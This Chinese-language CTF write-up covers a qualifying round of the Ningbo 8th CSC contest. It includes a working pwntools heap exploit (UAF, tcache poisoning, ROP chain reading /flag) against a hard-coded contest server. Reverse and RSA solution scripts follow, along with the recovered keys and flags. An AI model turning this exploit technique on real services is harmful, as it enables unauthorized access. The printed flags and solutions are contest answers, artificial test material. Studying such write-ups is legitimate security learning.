今天上午初赛结束了,感谢两个队友带,dr0n和Rot-will
槽点有点多,比如几个题AI秒出,我觉得以后出题都要反AI了,可能就留一个签到题AI能做,如果反AI,可能我真啥都不会了
AI这东西做逆向和密码非常厉害,逆向读伪代码和分析加解密,而这正是LLMs擅长的理解能力。做Web和Misc不太行,因为这两个用到的工具和环境太多。
两个WEB都是平平无奇登陆框,都做不出来,给的hint也做不出来,但是闲鱼一把梭。。。
两个杂项也古怪,队友做麻了,什么二维码小点点、博多密码,rgb转换之类
还有,我们做完4题已经第三名了,其他实在做不出来,就算其他队伍跟我们做一样的题,我们有前三血,那也应该排前面
但是最后三十分钟,我们连掉三十多名,我刷新一下掉一名,他们全都爆发了,不过应该能进决赛
部分附件在:https://github.com/TajangSec/Ningbo-8th-CSC-Pre
PWN
entity_cache
存在 UAF:entry 被 free 之后指针没有清空,仍然可以 show / edit,于是既能泄露 tcache 的 next 指针,也能改写它做 tcache poisoning。
1from pwn import *
2import LibcSearcher
def add(ind, size, data=b'\n'):
    """Menu option 1: allocate entry `ind` with `size` bytes and fill it with `data`.

    `data` goes out via sendafter (no newline appended), so the caller controls
    the exact bytes that land in the chunk. The default just sends a newline.
    """
    p.sendlineafter(b'Code: ', b'1')
    p.sendlineafter(b'id >', b'%d' % ind)
    p.sendlineafter(b'size >', b'%d' % size)
    p.sendafter(b'fragment >', data)
8
def edit(ind, data):
    """Menu option 2: overwrite the contents of entry `ind` with `data`.

    Works on freed entries as well (the script edits entry 1 after freeing it),
    which is the UAF write the exploit is built on.
    """
    p.sendlineafter(b'Code: ', b'2')
    p.sendlineafter(b'id >', b'%d' % ind)
    p.sendafter(b'stream >', data)
13
def free(ind):
    """Menu option 3: free entry `ind`.

    The service apparently keeps the stale pointer around: the exploit still
    calls show()/edit() on entries after freeing them.
    """
    p.sendlineafter(b'Code: ', b'3')
    p.sendlineafter(b'id >', b'%d' % ind)
17
def show(ind):
    """Menu option 4: print entry `ind`; the caller reads the leaked line itself.

    Used on a freed entry to read the tcache next pointer. Note the prompt here
    has a trailing space, unlike the other helpers -- reproduced as the service
    prints it.
    """
    p.sendlineafter(b'Code: ', b'4')
    p.sendlineafter(b'id > ', b'%d' % ind)
21
22
# --- Exploit driver (remote only; the local process() line is kept commented out) ---
# Flow: PIE leak from the service's debug line -> tcache poisoning through the UAF
# to get an allocation on top of the program's pointer table -> arbitrary
# read/write through that table -> libc and stack leaks -> ROP chain written
# onto the stack. The constants 0xa1a, 0xbcc, 0x202060 and the libc gadget
# offsets are specific to this challenge binary and ./libc.so; they are not
# derived here, so re-check them for any other build.
#p=process('entity_cache')
p=remote('139.155.126.78','26428')   # hard-coded CTF target; switch to process() for local testing
p.readuntil('[DEBUG INFO]')
e=ELF('./entity_cache')
libc=ELF('./libc.so')
# The service prints an address right after "[DEBUG INFO]"; 0xa1a is presumably
# that address's offset inside the binary, so subtracting it gives the PIE base.
e.address=int(p.readline(),16)-0xa1a
print(hex(e.address))

syscall=e.address+0xbcc   # presumably a `syscall ; ret` gadget inside the binary -- confirm
# Four 0xf0-byte entries (0x100-byte chunks). Entry 3 holds the path for the
# open() in the ROP chain; entry 2 is reused as the read/write buffer.
add(0,0xf0)
add(1,0xf0)
add(2,0xf0,'flag')
add(3,0xf0,'/flag')
free(0)
free(1)
# UAF read: entry 1 is freed but still viewable. Its first 8 bytes are now the
# tcache next pointer, i.e. the user address of chunk 0. The output is
# NUL-terminated, hence the ljust to 8 bytes.
# NOTE(review): on glibc >= 2.32 this pointer is mangled by safe-linking and
# would need demangling; the script assumes an older libc.
show(1)
heap0=u64(p.readuntil('\n',drop=1).ljust(8,b'\x00'))
print(hex(heap0))
heap3=heap0+0x100*3   # user pointer of entry 3 ("/flag")
heap2=heap0+0x100*2   # user pointer of entry 2 (scratch buffer)

# UAF write: replace the freed chunk's next pointer (tcache poisoning) with an
# address inside the binary -- 0x202060 is presumably the entry pointer table.
edit(1,p64(e.address+0x202060))
add(4,0xf0)   # takes chunk 1 back off the tcache
add(5,0xf0)   # next allocation is served from the poisoned address: entry 5 now overlaps the pointer table
# Writing to entry 5 rewrites slot 0 of the table (assuming slot 0 is its first
# 8 bytes), so show(0)/edit(0) read or write wherever that slot points:
# an arbitrary read/write primitive.
edit(5,p64(e.got['puts']))
show(0)   # leak puts@GOT -> libc base
puts=u64(p.readuntil('\n',drop=1).ljust(8,b'\x00'))
print(hex(puts))
libc.address=puts-libc.symbols['puts']
env=libc.symbols['environ']

edit(5,p64(env))   # read libc's environ -> a stack address
show(0)
stack=u64(p.readuntil('\n',drop=1).ljust(8,b'\x00')[:8])
print(hex(stack))
# stack-0x120+0x10 is where the ROP chain is written below -- presumably a saved
# return address, with the distance from environ found in a debugger. This read
# only prints what currently sits there, as a sanity check; stack1 is not used.
edit(5,p64(stack-0x120+8*2))
show(0)
stack1=u64(p.readuntil('\n',drop=1).ljust(8,b'\x00')[:8])
print(hex(stack1))


main_stack=stack-0x120+8*2
edit(5,p64(main_stack))   # point slot 0 at the stack so edit(0) writes there
#gdb.attach(p)
pause()   # pause here to attach a debugger before the stack overwrite

# libc gadget offsets (presumably pop rdi/rsi/rdx/rax ; ret for ./libc.so).
rdi=0x000000000002164f+libc.address
rsi=0x0000000000023a6a+libc.address
rdx=0x0000000000001b96+libc.address
rax=0x000000000001b500+libc.address
payload=b""
# open("/flag", 0 /*O_RDONLY*/, 0)      -- x86-64 SYS_open = 2
payload=p64(rax)+p64(2)+p64(rdi)+p64(heap3)+p64(rsi)+p64(0)+p64(rdx)+p64(0)+p64(syscall)
# read(3, buf, 0x50)                    -- SYS_read = 0; assumes the new fd is 3
payload+=p64(rax)+p64(0)+p64(rdi)+p64(3)+p64(rsi)+p64(heap2)+p64(rdx)+p64(0x50)+p64(syscall)
# write(1, buf, 0x50)                   -- SYS_write = 1
payload+=p64(rax)+p64(1)+p64(rdi)+p64(1)+p64(rsi)+p64(heap2)+p64(rdx)+p64(0x50)+p64(syscall)
print(hex(len(payload)))   # 0xd8 bytes, within the 0xf0 entry 0 was allocated with
edit(0,payload)   # chain lands on the stack; it fires when that frame returns (presumably via the menu's exit path)

p.interactive()
REVERSE
SEA_1
我不太会逆向,AI告诉我这是AES_ECB
其他选手说,贴在claude desktop或者vscode 的mcp里面,AI秒出,自己根本不用动
伪代码:
// IDA pseudocode of the SEA_1 checker (32-bit, cdecl). It reads a flag string,
// encrypts it 16 bytes at a time with a fixed key and compares the result with
// a 48-byte constant. The sub_* names are IDA auto-names; their roles below are
// inferred from how they are called and should be confirmed in the binary.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  size_t i; // [esp+190h] [ebp-268h]
  int v5[72]; // [esp+19Ch] [ebp-25Ch] BYREF   -- cipher context / expanded key (288 bytes)
  char v6[44]; // [esp+2BCh] [ebp-13Ch] BYREF   -- key string
  char Buf1[136]; // [esp+2E8h] [ebp-110h] BYREF   -- ciphertext of the input
  char Str[132]; // [esp+370h] [ebp-88h] BYREF   -- user input

  __CheckForDebuggerJustMyCode(&unk_45A019);   // MSVC "Just My Code" debug stub, presumably no anti-debug effect
  memset(Str, 0, 0x80u);    // input buffer zero-filled: unused tail of the last block is 0x00, not PKCS#7 padding
  memset(Buf1, 0, 0x80u);
  sub_401E00("Please input the flag and I will verify it: ");   // printf-like
  sub_401E70("%128s", Str);   // scanf-like; at most 128 chars + NUL, fits Str[132]
  strcpy(v6, "58453eec4d16ae234a10b597dfe1f6a6");   // 32 ASCII bytes of key material (the hex digits are used as-is, not decoded)
  if ( sub_4016B0(v5, v6, 256) )   // key setup into v5; 256 presumably the key size in bits, i.e. AES-256 with the 32-byte string -- confirm
    return -1;
  for ( i = 0; i < strlen(Str); i += 16 )   // one 16-byte block per iteration; no IV or chaining visible here (ECB-style)
  {
    if ( sub_401410((int)v5, (int)&Buf1[i], &Str[i]) )   // encrypt Str[i..i+16) into Buf1[i..i+16); max i = 112, so Buf1 is not overrun
      return -1;
  }
  if ( !memcmp(Buf1, &unk_458014, 0x30u) )   // compare 48 bytes = 3 blocks with the embedded ciphertext
    sub_401E00("Right flag!\n");
  else
    sub_401E00("Wrong flag\n");
  return 0;
}
AES 加密,密钥是 58453eec4d16ae234a10b597dfe1f6a6(32 个 ASCII 字节,直接当作密钥使用;伪代码里 sub_4016B0(v5, v6, 256) 的 256 应该就是密钥位数,即 AES-256),密文是 unk_458014,dump 出来是 29708f1980cce40f46abac148d488ca83716fe1d397202797b1999166265623e8f761285cb28e256b381167761e41094(0x30 = 48 字节,3 个分组)。注意输入缓冲区先被 memset 清零、再按 16 字节逐块加密,所以最后一块是零填充而不是 PKCS#7,解密结果末尾会带 0x00 而不是 padding 字节。
cyberchef解开:DASCTF{75aab2560274ae21aa4554b993e658d1}
flower_world
1 97704D -= 120;
2 977070 ^= 0x4Fu;
3 977055 -= 30;
4 977064 -= 93;
5 977048 += 95;
6 97704A += 103;
7 97705C ^= 0x82u;
8 977069 += 52;
9 97705E ^= 3u;
10 977041 += 71;
11 977076 ^= 0xE0u;
12 97706D -= 44;
13 977044 -= 127;
14 977075 -= 71;
15 977060 ^= 0xAAu;
16 97704E -= 119;
17 977062 ^= 0xAu;
18 97707D -= 48;
19 977075 += 55;
20 97705B += 111;
21 97706E ^= 0x32u;
22 97706C -= 92;
23 97705F ^= 0x29u;
24 977041 += 79;
25 97704A += 58;
26 977062 -= 17;
27 97705A += 123;
28 977075 -= 100;
29 97705C -= 64;
30 977056 -= 89;
31 977070 ^= 0x73u;
32 977062 ^= 0x61u;
33 97706E += 118;
34 977062 += 41;
35 977070 += 78;
36 977055 -= 11;
37 97704F ^= 0x5Eu;
38 977070 ^= 0xB2u;
39 977066 -= 66;
40 977046 ^= 0xECu;
41 977062 ^= 0xD1u;
42 977046 -= 99;
43 977069 -= 49;
44 977046 += 32;
45 977066 += 61;
46 977042 ^= 0x42u;
47 977055 += 109;
48 977070 += 14;
49 97707B -= 52;
50 97706E -= 94;
51 977074 += 57;
52 97705D -= 30;
53 97705E -= 107;
54 977048 += 55;
55 97704C -= 27;
56 97706F -= 88;
57 97707A -= 105;
58 977040 += 25;
59 97704C += 73;
60 97706F -= 80;
61 977070 += 125;
62 97706E -= 44;
63 97707A += 11;
64 977068 ^= 0x57u;
65 977062 += 117;
66 977056 += 92;
67 97705B ^= 0x7Au;
68 977043 += 33;
69 977045 ^= 0xC3u;
70 97705E += 19;
71 977064 -= 46;
72 977065 -= 45;
73 977067 ^= 0xB0u;
74 97704F -= 69;
75 977061 ^= 0xDCu;
76 977046 += 69;
77 97707E += 116;
78 97704B ^= 0x22u;
79 977063 ^= 0x7Eu;
80 977054 += 18;
81 977072 -= 11;
82 97704E ^= 5u;
83 97706E += 58;
84 977048 += 44;
85 97706D ^= 0xE4u;
86 977068 -= 30;
87 977063 += 96;
88 977047 -= 49;
89 977062 += 83;
90 97707A += 53;
91 97706A ^= 0x21u;
92 97707C += 49;
93 97705B += 11;
94 977070 -= 105;
95 977063 -= 47;
96 977073 -= 67;
97 977047 += 94;
98 97707E += 78;
99 97704F -= 96;
100 97707A ^= 0xD3u;
101 977043 += 115;
102 97705E -= 127;
103 97707A -= 86;
104 977074 += 32;
105 977067 ^= 0x5Cu;
106 977049 -= 64;
107 97706B ^= 0x8Eu;
108 97707E += 121;
109 977054 -= 98;
110 977074 ^= 0x22u;
111 97704F -= 12;
112 977045 ^= 0x2Du;
113 97707C -= 44;
114 97704D -= 74;
115 977061 ^= 0x82u;
116 977068 ^= 0xEDu;
117 977071 ^= 0xBEu;
118 977077 += 4;
119 97705E -= 120;
120 97704B += 67;
121 977072 -= 52;
122 977042 ^= 0x87u;
123 977067 -= 38;
124 97707B ^= 0xFAu;
125 977072 += 90;
126 97706E -= 9;
127 977077 ^= 0x2Fu;
128 977049 += 83;
129 97706B ^= 0xD6u;
130 977062 -= 6;
131 977048 -= 119;
132 977061 -= 118;
133 977062 -= 75;
134 977068 -= 52;
135 977040 -= 108;
136 97706A += 28;
137 97707C ^= 0x4Cu;
138 97706C ^= 0x4Au;
139 977061 ^= 0xFDu;
140 977063 += 125;
141 977041 ^= 0x6Cu;
142 977075 += 25;
143 977071 -= 7;
144 97707D -= 119;
145 97706F -= 16;
146 977064 += 53;
147 977066 ^= 0x56u;
148 977042 ^= 0xF2u;
149 97706B += 115;
150 977055 -= 37;
151 977072 -= 51;
152 977041 -= 107;
153 97704F -= 116;
154 97705C += 46;
155 977065 -= 67;
156 97704C += 113;
157 977061 += 114;
158 97704E += 69;
159 977060 += 99;
160 977064 ^= 0x88u;
161 977079 -= 37;
162 97705E ^= 0x76u;
163 977070 += 95;
164 97707A += 51;
165 977074 ^= 0xD3u;
166 97704F -= 86;
167 977040 -= 6;
168 97707C -= 8;
169 977071 ^= 0x30u;
170 97705B += 29;
171 977070 += 65;
172 97705D ^= 0xEEu;
173 977047 -= 31;
174 977061 -= 16;
175 977071 += 9;
176 977064 -= 46;
177 977049 ^= 0xDEu;
178 977054 ^= 0x6Du;
179 977065 -= 91;
180 977077 += 119;
181 97707D -= 8;
182 --977061;
183 977075 += 124;
184 977068 += 3;
185 977059 -= 22;
186 977060 ^= 0xD3u;
187 977072 ^= 0xA4u;
188 977040 ^= 0xA8u;
189 97707F += 50;
190 97707E ^= 0x4Du;
191 977070 += 60;
192 97704B += 49;
193 97707B += 3;
194 97706A -= 20;
195 977060 -= 38;
196 977063 -= 2;
197 97707B -= 108;
198 97707E -= 71;
199 97706E += 111;
200 977040 ^= 0xD9u;
201 97704E += 76;
202 97706F ^= 0xF6u;
203 97705B += 26;
204 977040 -= 27;
205 977060 -= 80;
206 977078 -= 27;
207 97705B += 7;
208 ++977073;
209 977075 ^= 0xDDu;
210 977043 -= 127;
211 977072 += 116;
212 977069 -= 70;
213 977065 ^= 0x9Bu;
214 977059 -= 34;
215 97704B -= 127;
216 97707F ^= 0xBu;
217 977058 -= 65;
218 97704B ^= 0x83u;
219 977059 ^= 0xB6u;
220 977067 -= 25;
221 977042 -= 94;
222 977061 ^= 0x7Eu;
223 977072 -= 69;
224 977077 -= 72;
225 977060 ^= 0xF7u;
226 977043 -= 11;
227 977069 ^= 0x64u;
228 977075 ^= 0xEu;
229 977073 -= 111;
230 977065 ^= 0x7Au;
231 97706B -= 7;
232 977060 += 103;
233 97707D ^= 0xF4u;
234 977077 += 16;
235 97705C ^= 0x89u;
236 977041 -= 20;
237 97707A ^= 0x3Fu;
238 97704D -= 31;
239 977073 += 98;
240 977073 -= 5;
241 977061 -= 30;
242 97704C += 73;
243 977054 -= 6;
244 977071 ^= 0x56u;
245 97705B ^= 3u;
246 977055 -= 119;
247 97706D += 37;
248 97705E += 4;
249 977044 -= 48;
250 977076 ^= 0xF4u;
251 977053 ^= 0x10u;
252 977059 ^= 0x47u;
253 977060 ^= 0xE2u;
254 97704E -= 16;
255 97705E ^= 0xD2u;
256 977042 += 70;
257 977060 -= 91;
258 977041 ^= 0x12u;
259 977042 -= 81;
260 977047 += 92;
261 977055 -= 77;
262 97705D ^= 0x7Du;
263 977070 ^= 0x4Au;
264 977074 -= 25;
265 977074 -= 127;
266 97704B += 121;
267 97706C += 64;
268 97707A ^= 0x58u;
269 97704B -= 123;
270 977078 += 42;
271 977071 -= 89;
272 97707E ^= 0x99u;
273 977043 -= 6;
274 977045 ^= 0x7Du;
275 977042 -= 14;
276 977064 += 96;
277 977058 += 26;
278 97706E += 54;
279 977052 -= 86;
280 97705D ^= 0x4Eu;
281 977055 -= 15;
282 977078 -= 32;
283 977057 += 75;
284 97706E += 66;
285 977053 += 101;
286 97705E -= 59;
287 97706B ^= 0xFAu;
288 977042 += 93;
289 977073 -= 123;
290 97707C += 31;
291 977064 ^= 0xA2u;
292 977073 -= 32;
293 97705A ^= 0x11u;
294 97707D += 121;
295 977074 -= 99;
296 977054 ^= 0x68u;
297 97706D -= 75;
298 977041 -= 117;
299 977043 += 92;
300 977041 += 88;
301 97704D -= 4;
302 977052 ^= 0x43u;
303 97704B += 8;
304 97706A -= 82;
305 977055 += 56;
306 977049 += 43;
307 977075 ^= 0xD1u;
308 97705D ^= 0x1Bu;
309 977052 -= 74;
310 97707B -= 104;
311 977073 -= 6;
312 977053 -= 120;
313 977043 -= 6;
314 977069 -= 2;
315 97705E ^= 0xFEu;
316 97707E ^= 0x45u;
317 977052 += 5;
318 977068 ^= 0x36u;
319 977051 -= 42;
320 977050 ^= 0xD6u;
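"""Undo the flower_world byte-by-byte transform.

``1.txt`` holds the decompiled forward transform, one statement per line in one
of four shapes -- ``977040 += 25;``, ``977055 ^= 0x4Fu;``, ``--977061;`` or
``++977073;`` -- where the hex number on the left is the address of the byte
being modified and ``base`` is the lowest such address.  ``data`` is the
expected output dumped from the binary.  Replaying each byte's operations in
reverse order with the inverse operation recovers the input.

Parsing uses ``int()`` only (no ``eval``), so a stray line in the dump cannot
execute anything.  The debug ``print(e[0])`` of the original was dropped; the
final ``print(bytes(...))`` is unchanged.
"""

data = [0x7F, 0x11, 0x4A, 0x9D, 0xA5, 0xD5, 0x99, 0x9F, 0xAC, 0xD3,
        0xD4, 0xBC, 0x1A, 0x53, 0x46, 0xF4, 0xE7, 0x37, 0x03, 0x60,
        0x17, 0xBA, 0x67, 0xAC, 0x09, 0xDA, 0xA0, 0xFB, 0x2D, 0x8E,
        0xCB, 0x11, 0x02, 0xC4, 0x17, 0xF7, 0x1B, 0x8F, 0x67, 0x52]
base = 0x977040


def parse_int(s):
    """Parse a decompiler literal: hex when it carries a ``0x`` prefix, else decimal."""
    s = s.strip()
    if '0x' in s:
        return int(s, 16)
    return int(s)


def parse_op(line):
    """Turn one statement into ``(byte_index, op, value)`` or ``None``.

    ``op`` is the forward operation, one of ``'-'``, ``'^'``, ``'+'``;
    ``--addr`` / ``++addr`` become ``('-', 1)`` / ``('+', 1)``.  Lines that
    are none of these forms (blank lines, braces, ...) yield ``None``.
    """
    stmt = line.strip().rstrip(';').strip()
    if not stmt:
        return None
    if stmt[:2] in ('--', '++'):
        return int(stmt[2:].strip(), 16) - base, stmt[0], 1
    for token in ('-=', '^=', '+='):
        lhs, sep, rhs = stmt.partition(token)
        if sep:
            # values look like ``25`` or ``0x4Fu``; drop the C ``u`` suffix
            return int(lhs.strip(), 16) - base, token[0], parse_int(rhs.rstrip('u'))
    return None


def parse_ops(lines):
    """Group the forward operations by byte index, preserving program order."""
    ops = {}
    for line in lines:
        parsed = parse_op(line)
        if parsed is None:
            continue
        idx, op, val = parsed
        ops.setdefault(idx, []).append((op, val))
    return ops


def undo(data, ops):
    """Invert the transform: walk each byte's ops last-to-first, applying the inverse.

    Indices outside ``data`` are skipped (the dump is 40 bytes while the
    transform touches addresses up to base+0x3F).  Returns a new list; the
    argument is left untouched.
    """
    out = list(data)
    for idx, seq in ops.items():
        if idx >= len(out):
            continue
        v = out[idx]
        for op, val in reversed(seq):
            if op == '-':
                v += val      # inverse of '-='
            elif op == '^':
                v ^= val      # xor is its own inverse
            else:
                v -= val      # inverse of '+='
        out[idx] = v & 0xff   # the target is a byte: wrap like the binary does
    return out


if __name__ == '__main__':
    with open('1.txt') as fh:
        d = fh.read().splitlines()
    e = parse_ops(d)
    print(bytes(undo(data, e)))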
CRYPTO
Three-prime RSA
https://chatgpt.com/share/68a14d43-ab10-800b-bbee-7e4511dfaaea
AI太猛了
从 r_cubed 恢复 r
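def _icbrt(n):
    """Exact integer cube root (floor) of a non-negative int, by Newton's method.

    ``n ** (1/3)`` goes through a float, which only carries 53 bits of
    mantissa: for an r of CTF size (hundreds of bits) ``int(round(...))`` is
    simply wrong, and for n >= 2**1024 it raises OverflowError.  This stays
    in integer arithmetic for any size.
    """
    if n < 0:
        raise ValueError("cube root of a negative number")
    if n < 2:
        return n
    x = 1 << ((n.bit_length() + 2) // 3)   # 2**ceil(bits/3) >= cbrt(n)
    while True:
        y = (2 * x + n // (x * x)) // 3   # decreases monotonically from above
        if y >= x:
            return x
        x = y


r = _icbrt(r_cubed)
if r ** 3 != r_cubed:   # r_cubed must be a perfect cube, otherwise the recovery is wrong
    raise ValueError("r_cubed is not a perfect cube")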
从 D 中恢复 (p+q+r) 和 random_num
题目中 random_num 是一个 28 位质数,p+q+r 大约 512~514 位。因为 (p+q+r)*random_num < n,所以 D 没有受到取模的影响,可以直接从 D 中分解出 (p+q+r) 和 random_num:
求p+q
p_plus_q = s - r
解一元二次方程得到 p 和 q
方程:x^2 - (p+q)x + p*q = 0
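from math import isqrt

# Recover p and q from s = p + q and pq = p * q by solving
# x^2 - s*x + pq = 0 exactly over the integers: no sympy, no floats, and the
# result is checked instead of trusting int() on whatever root came back.
disc = p_plus_q * p_plus_q - 4 * pq
if disc < 0:
    raise ValueError("p+q and p*q are inconsistent: negative discriminant")
root = isqrt(disc)
if root * root != disc:
    raise ValueError("p+q and p*q are inconsistent: discriminant is not a perfect square")
p = (p_plus_q - root) // 2
q = (p_plus_q + root) // 2
if p * q != pq:
    raise ValueError("recovered p, q do not multiply back to pq")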
计算 d 并解密
from Crypto.Util.number import long_to_bytes, inverse

# Textbook RSA with a three-prime modulus n = p*q*r, so phi(n) = (p-1)(q-1)(r-1).
# e = 65537 is the public exponent assumed from the challenge -- confirm.
e = 65537
phi = (p - 1) * (q - 1) * (r - 1)
d = inverse(e, phi)      # private exponent: e * d == 1 (mod phi)
m = pow(c, d, n)
flag = long_to_bytes(m)
print(flag)
DASCTF{5521a971-9bed-11ef-bfda-14ac6024b6a8}